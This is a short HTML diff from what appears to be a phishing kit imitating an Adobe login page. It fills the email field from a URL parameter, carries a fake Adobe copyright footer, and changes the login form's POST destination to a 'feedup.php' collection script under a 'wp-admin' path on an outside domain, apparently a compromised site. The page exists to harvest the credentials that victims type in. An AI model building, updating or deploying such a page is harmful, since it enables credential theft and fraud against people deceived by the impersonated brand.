--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://iteach.com.mx/feedup.php" method="post">
+                <form action="https://www.samseagroup.com/wp-admin/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
@@ -323,7 +323,7 @@ $("#email").val($.urlPeram('email'));
              </div>
                <!-- This div spans the 12 columns of the display -->
              <div class="col-sm-12 col-md-12 col-lg-12 mt-0">
-                 <small style="font-size:10px;"> ©2021 Adobe Inc.</small>
+                 <small style="font-size:10px;"> ©2022 Adobe Inc.</small>
              </div>
           </div>
          
